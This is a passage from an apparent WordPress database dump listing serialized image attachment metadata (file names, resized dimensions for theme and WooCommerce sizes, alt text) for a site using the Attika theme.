:4:\"file\";s:26:\"h1-blog-post-2-768x727.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:727;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-2-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-2-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-2-650x1230.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h1-blog-post-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-2-600x568.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:568;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-2-600x568.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:568;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51696,1828,'_wp_attachment_image_alt','m'),(51697,4340,'_wp_attached_file','2018/08/h4-rev-img-2.jpg'),(51698,4340,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1438;s:6:\"height\";i:844;s:4:\"file\";s:24:\"2018/08/h4-rev-img-2.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-2-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-2-1024x601.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:601;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-2-768x451.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-2-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-2-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-2-650x844.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:844;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-2-1300x844.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:844;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"h4-rev-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-2-600x352.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:352;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-2-600x352.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:352;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"h4-rev-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51699,4341,'_wp_attached_file','2018/08/h5-img-6.jpg'),(51700,4341,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:449;s:6:\"height\";i:300;s:4:\"file\";s:20:\"2018/08/h5-img-6.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-6-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h5-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51701,4342,'_wp_attached_file','2018/08/h2-port-img-4a.jpg'),(51702,4342,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:630;s:4:\"file\";s:26:\"2018/08/h2-port-img-4a.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h2-port-img-4a-300x145.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:145;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"h2-port-img-4a-1024x496.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:496;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-4a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"h2-port-img-4a-768x372.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"h2-port-img-4a-650x630.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:630;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h2-port-img-4a-650x630.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:630;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h2-port-img-4a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"h2-port-img-4a-600x291.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:291;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-4a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"h2-port-img-4a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"h2-port-img-4a-600x291.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:291;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h2-port-img-4a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51703,1591,'_wp_attached_file','2018/08/h2-rev-img-1.jpg'),(51704,1591,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1202;s:6:\"height\";i:721;s:4:\"file\";s:24:\"2018/08/h2-rev-img-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-1-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"h2-rev-img-1-1024x614.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:614;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-1-768x461.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:461;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:25:\"h2-rev-img-1-1202x650.jpg\";s:5:\"width\";i:1202;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-1-650x721.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:721;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"h2-rev-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-1-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-1-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"h2-rev-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51705,1901,'_wp_attached_file','2018/07/port-single-img-1a.jpg'),(51706,1901,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:900;s:4:\"file\";s:30:\"2018/07/port-single-img-1a.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"port-single-img-1a-300x208.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:208;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"port-single-img-1a-1024x709.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:709;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"port-single-img-1a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"port-single-img-1a-768x532.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:532;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:30:\"port-single-img-1a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:31:\"port-single-img-1a-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:30:\"port-single-img-1a-650x900.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"port-single-img-1a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"port-single-img-1a-600x415.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:415;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"port-single-img-1a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"port-single-img-1a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"port-single-img-1a-600x415.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:415;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"port-single-img-1a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51707,4341,'_wp_attachment_image_alt','m'),(51708,4343,'_wp_attached_file','2018/08/h5-img-8.jpg'),(51709,4343,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:465;s:6:\"height\";i:975;s:4:\"file\";s:20:\"2018/08/h5-img-8.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-8-143x300.jpg\";s:5:\"width\";i:143;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:20:\"h5-img-8-465x650.jpg\";s:5:\"width\";i:465;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:20:\"h5-img-8-465x650.jpg\";s:5:\"width\";i:465;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"h5-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51710,4342,'_wp_attachment_image_alt','m'),(51711,1449,'_wp_attachment_image_alt','c'),(51712,4340,'_wp_attachment_image_alt','m'),(51713,1591,'_wp_attachment_image_alt','m'),(51714,4343,'_wp_attachment_image_alt','m'),(51715,1901,'_wp_attachment_image_alt','m'),(51716,4344,'_wp_attached_file','2018/08/h6-img-1a.jpg'),(51717,4344,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:820;s:4:\"file\";s:21:\"2018/08/h6-img-1a.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h6-img-1a-300x205.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"h6-img-1a-1024x700.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-1a-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"h6-img-1a-768x525.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:21:\"h6-img-1a-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"h6-img-1a-1200x650.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:21:\"h6-img-1a-650x820.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h6-img-1a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"h6-img-1a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-1a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"h6-img-1a-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"h6-img-1a-600x410.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h6-img-1a-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51718,1450,'_wp_attached_file','2018/08/h1-blog-post-3.jpg'),(51719,1450,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1785;s:4:\"file\";s:26:\"2018/08/h1-blog-post-3.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-3-218x300.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-3-746x1024.jpg\";s:5:\"width\";i:746;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-3-768x1055.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1055;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:28:\"h1-blog-post-3-1119x1536.jpg\";s:5:\"width\";i:1119;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-3-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-3-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"h1-blog-post-3-650x1300.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:28:\"h1-blog-post-3-1300x1300.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"h1-blog-post-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-3-600x824.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-3-600x824.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:824;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"h1-blog-post-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51720,1902,'_wp_attached_file','2018/07/port-single-img-2a.jpg'),(51721,1902,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:900;s:4:\"file\";s:30:\"2018/07/port-single-img-2a.jpg\";s:5